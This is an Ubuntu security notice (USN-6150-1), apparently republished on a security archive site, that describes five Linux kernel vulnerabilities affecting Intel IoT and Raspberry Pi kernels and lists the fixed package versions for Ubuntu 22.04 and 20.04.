*   OpenBSD (482)
*   RedHat (13,370)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,652)
*   UNIX (9,246)
*   UnixWare (186)
*   Windows (6,557)
*   Other

P2S CMS 0.1 Cross Site Scripting

Ubuntu Security Notice 6150-1 - Patryk Sondej and Piotr Krysiuk discovered that a race condition existed in the netfilter subsystem of the Linux kernel when processing batch requests, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. Gwangun Jung discovered that the Quick Fair Queueing scheduler implementation in the Linux kernel contained an out-of-bounds write vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-6150-1  
June 08, 2023

linux-intel-iotg, linux-raspi vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-intel-iotg: Linux kernel for Intel IoT platforms  
- linux-raspi: Linux kernel for Raspberry Pi systems

Details:

Patryk Sondej and Piotr Krysiuk discovered that a race condition existed in  
the netfilter subsystem of the Linux kernel when processing batch requests,  
leading to a use-after-free vulnerability. A local attacker could use this  
to cause a denial of service (system crash) or possibly execute arbitrary  
code. (CVE-2023-32233)

Gwangun Jung discovered that the Quick Fair Queueing scheduler  
implementation in the Linux kernel contained an out-of-bounds write  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2023-31436)

Reima Ishii discovered that the nested KVM implementation for Intel x86  
processors in the Linux kernel did not properly validate control registers  
in certain situations. An attacker in a guest VM could use this to cause a  
denial of service (guest crash). (CVE-2023-30456)

It was discovered that the Broadcom FullMAC USB WiFi driver in the Linux  
kernel did not properly perform data buffer size validation in some  
situations. A physically proximate attacker could use this to craft a  
malicious USB device that when inserted, could cause a denial of service  
(system crash) or possibly expose sensitive information. (CVE-2023-1380)

Jean-Baptiste Cayrou discovered that the shiftfs file system in the Ubuntu  
Linux kernel contained a race condition when handling inode locking in some  
situations. A local attacker could use this to cause a denial of service  
(kernel deadlock). (CVE-2023-2612)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS:  
   linux-image-5.15.0-1030-raspi   5.15.0-1030.32  
   linux-image-5.15.0-1030-raspi-nolpae  5.15.0-1030.32  
   linux-image-5.15.0-1031-intel-iotg  5.15.0-1031.36  
   linux-image-intel-iotg          5.15.0.1031.30  
   linux-image-raspi               5.15.0.1030.27  
   linux-image-raspi-nolpae        5.15.0.1030.27

Ubuntu 20.04 LTS:  
   linux-image-5.4.0-1086-raspi    5.4.0-1086.97  
   linux-image-raspi               5.4.0.1086.116  
   linux-image-raspi2              5.4.0.1086.116

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6150-1  
   CVE-2023-1380, CVE-2023-2612, CVE-2023-30456, CVE-2023-31436,  
   CVE-2023-32233

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-intel-iotg/5.15.0-1031.36  
   https://launchpad.net/ubuntu/+source/linux-raspi/5.15.0-1030.32  
   https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1086.97

Tag

#ubuntu